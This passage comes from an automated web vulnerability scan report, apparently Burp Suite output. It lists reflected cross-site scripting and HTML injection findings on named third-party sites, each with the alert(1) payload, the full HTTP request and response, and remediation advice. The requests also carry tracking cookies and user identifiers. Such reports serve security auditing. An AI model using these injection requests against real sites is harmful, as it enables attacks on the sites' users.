Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1; __utmz=11603627.1305206897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11603627.345061338.1305206897.1305206897.1305206897.1; __utmc=11603627; __utmb=11603627.2.10.1305206897; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10087&ASK05540_10174&ASK05540_10185&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10283&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10342&ASK05540_10343&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10432&ASK05540_10458&ASK05540_10537&ASK05540_10538&ASK05540_10562&ASK05540_10265&ASK05540_10166&ASK05540_10249&ASK05540_10263&ASD08734_72078; __csref=; __cst=78ae66beea02e0ce; __csv=6522d442e56f04a6|0; __csnv=614cd52b5cceb9eb; __ctl=6522d442e56f04a61; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:32:19 GMT
Server: Apache
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 44036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="canonical" href="http://www.zdnet.com/937ea"><a>15ddfa8a42c" />
...[SNIP]...

2.133. http://z.about.com/6g/ip/284/27.htm [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://z.about.com
Path:   /6g/ip/284/27.htm

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eee74'%3balert(1)//693455e81fa was submitted in the s parameter. This input was echoed as eee74';alert(1)//693455e81fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6g/ip/284/27.htm?s=urbanlegendseee74'%3balert(1)//693455e81fa HTTP/1.1
Host: z.about.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; jsc=13; Mint=B5CDUi2520kA1h03; zBT=1; pc=1; zFD=B5C1B5310B50220B00202; zRf=-2; gs=urbanlegends

Response

HTTP/1.1 200 OK
Age: 1
Date: Thu, 12 May 2011 13:33:11 GMT
Expires: Thu, 12 May 2011 14:33:11 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
ETag: "KXDIJCDIDLXSXXPPP"
Server: Apache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html
Content-Length: 1385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>About.com Special Features</title></head>

<style>html, body, div, span, h3, h
...[SNIP]...
<script type="text/javascript">function zr(m){return Math.floor(Math.random()*99999)%m}
zDL=new Date();zTbC=0;gs='urbanlegendseee74';alert(1)//693455e81fa';ch='';
function zT(l,p){m=new Date(),n=m.getTime()-zDL.getTime(),u='_',t=l.href;l.href='http://clk.about.com/?zi='+p+'&sdn='+gs+'&cdn='+ch+'&tm='+Math.round(n/1000)+(zTbC?'&acs='+zTbC:'')+'&bts=1&zu=
...[SNIP]...

2.134. http://adserving2.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1400'-alert(1)-'26e8be3e852 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f1400'-alert(1)-'26e8be3e852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:28 GMT
Content-Length: 604

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.google.com/search%3Fhl=en%26q=f1400'-alert(1)-'26e8be3e852&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565">
...[SNIP]...

2.135. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74cb2"><a>261d8688779 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 74cb2"><a>261d8688779

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:58 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:28:58 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 111029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/r=8041&amp;sg=505129&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=207595&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e7:4DCB7DA94F2C06&amp;orh=74cb2"><a>261d8688779&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=74cb2">
...[SNIP]...

2.136. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a3d"><a>e333a2fc2f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 24a3d"><a>e333a2fc2f5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:32 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:28:32 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 111103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/i/r=9953&amp;sg=1815&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=207595&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e2:4DCB83254AEF44&amp;orh=24a3d"><a>e333a2fc2f5&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=24a3d">
...[SNIP]...

2.137. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload 3bca7<script>alert(1)</script>045da951e20 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=130145721913036138033bca7<script>alert(1)</script>045da951e20; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:06 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-06_15024998381305207306; expires=Tue, 10-May-2016 13:35:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15024998381305207306; expires=Thu, 12-May-2011 13:50:06 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='130145721913036138033bca7<script>alert(1)</script>045da951e20';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15024998381305207306';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...

2.138. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 68287<script>alert(1)</script>04ab1212fa was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=168287<script>alert(1)</script>04ab1212fa; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:33 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25944

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&', "BMX_3PC": '168287<script>alert(1)</script>04ab1212fa', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...

2.139. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 760be<script>alert(1)</script>4fe4a12fecf was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C760be<script>alert(1)</script>4fe4a12fecf; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:33 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25945

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
096&', "ar_p82806590": 'exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C760be<script>alert(1)</script>4fe4a12fecf', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...

2.140. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

